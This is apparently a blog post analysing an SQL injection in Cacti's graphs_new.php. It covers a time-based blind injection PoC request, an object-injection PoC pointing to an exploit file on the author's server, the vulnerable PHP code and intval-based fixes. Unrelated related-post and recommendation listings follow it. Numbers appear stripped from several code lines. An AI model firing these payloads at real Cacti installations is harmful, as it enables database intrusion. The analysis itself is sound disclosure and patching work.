catalogue

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

0x1: POC1: SQL Inject

POST /cacti/graphs_new.php HTTP/1.1

Host: 192.168.217.133

Proxy-Connection: keep-alive

Cache-Control: max-age=

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://192.168.217.133 [^]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2

Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Inject

. Login

. POST  http://target/cacti/graphs_new.php

   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]

    {Injection exp can be found on my server: http://pandas.pw/cacti.exp}

. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--

3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

/* set default action */

if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

switch ($_REQUEST["action"]) {

    case 'save':

        //track function form_save

        form_save();

        break;

    case 'query_reload':

        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);

        break;

    default:

        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php");

        break;

}

form_save();

function form_save()

{

    ..

    if (isset($_POST["save_component_new_graphs"]))

    {

        //Track function host_new_graphs_save()

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs_save();

function host_new_graphs_save()

{

    //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.

    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));

    ..

    //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);

    ..

}

0x2: Vuls-2: SQL Injection

function form_save()

{

    if (isset($_POST["save_component_graph"]))

    {

        /* summarize the 'create graph from host template/snmp index' stuff into an array */

        while (list($var, $val) = each($_POST))

        {

            if (preg_match('/^cg_(\d+)$/', $var, $matches))

            {

                $selected_graphs["cg"]{$matches[]}{$matches[]} = true;

            }

            //cg_g is not filtered

            elseif (preg_match('/^cg_g$/', $var))

            {

                if ($_POST["cg_g"] > )

                {

                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;

                }

            }

            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))

            {

                $selected_graphs["sg"]{$matches[]}{$_POST{"sgg_" . $matches[]}}{$matches[]} = true;

            }

        }

        if (isset($selected_graphs))

        {

            //外部输入参数带入host_new_graphs中

            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

            exit;

        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

    if (isset($_POST["save_component_new_graphs"])) {

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1; 

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. 防御方法

/graphs_new.php

function host_new_graphs_save()

{

    ..

    /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));

    ..

}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1;

                /**/

                $graph_template_id = intval($graph_template_id);

                /**/

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://www.cacti.net/download_cacti.php

6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

Cacti /graphs_new.php SQL Injection Vulnerability的更多相关文章

  1. FlarumChina SQL injection Vulnerability

    First,We need to download our vulnerable program in GitHub links:https://github.com/skywalker512/Fla ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. Linux 网络编程详解三(p2p点对点聊天)

    //p2p点对点聊天多进程版--服务器(信号的使用) #include <stdio.h> #include <stdlib.h> #include <string.h& ...

  2. rpc框架: thrift/avro/protobuf 之maven插件生成java类

    thrift.avro.probobuf 这几个rpc框架的基本思想都差不多,先定义IDL文件,然后由各自的编译器(或maven插件)生成目标语言的源代码,但是,根据idl生成源代码这件事,如果每次都 ...

  3. 2015-2016-2 《Java程序设计》 学生博客及Git@OSC 链接

    2015-2016-2 <Java程序设计> 学生博客及Git@OSC 链接 博客 1451 20145101王闰开 20145102周正一 20145103冯文华 20145104张家明 ...

  4. CentOS 7下的 Mysql 主从配置

    最近在玩mysql主从配置,在此记录一下 一.前言 1.安装两个虚拟机(CentOS 7).iP分别是192.168.47.131 和192.168.47.133.其中192.168.47.133作为 ...

  5. GitHub 上一份很受欢迎的前端代码优化指南-强烈推荐收藏

    看到一份很受欢迎的前端代码指南,根据自己的理解进行了翻译,但能力有限,对一些JS代码理解不了,如有错误,望斧正. HTML 语义化标签 HTML5 提供了很多语义化元素,更好地帮助描述内容.希望你能从 ...

  6. ArcGIS支持MongoDB数据源

    ArcGIS支持MongoDB数据源 自从NoSQL推出之后,MongoDB就作为比较杰出的代表受到广大用户的推崇,当然,与之而来的大数据的讨论也非常激烈,GIS数据源向来都是以海量来计算,所以,GI ...

  7. C#之发送邮件汇总

    最近想搞个网站,其中找回密码用到了我们常见到的利用邮箱找回.利用邮箱的好处是可以有效确认修改密码者的身份. 百度了几篇博客,各有千秋.最终采用了QI Fei同志的博客,有Demo下载,看了看思路清晰, ...

  8. Docker总结(图片打开略慢请知晓)

  9. android 布局之scrollview

    今天在布局页面的时候后犯了难,我要显示的内容一个页面展示不完,怎么办呢? 于是随便找了个app点开一看,哎呀原来还能翻动啊!这是啥布局呢?原来是ScrollView 官方api相关的内容全是英文,这可 ...

  10. 屠龙之路_向恶龙Alpha进发_FirstDay

    听说山的那边海的那边,出现了一头名为Alpha的恶龙,此龙无恶不作,还掠走了国王那漂酿的公主.少年很是气愤,大吼:"放开那女孩!!!",于是找到了志同道合的六位勇士,一起组成了屠龙 ...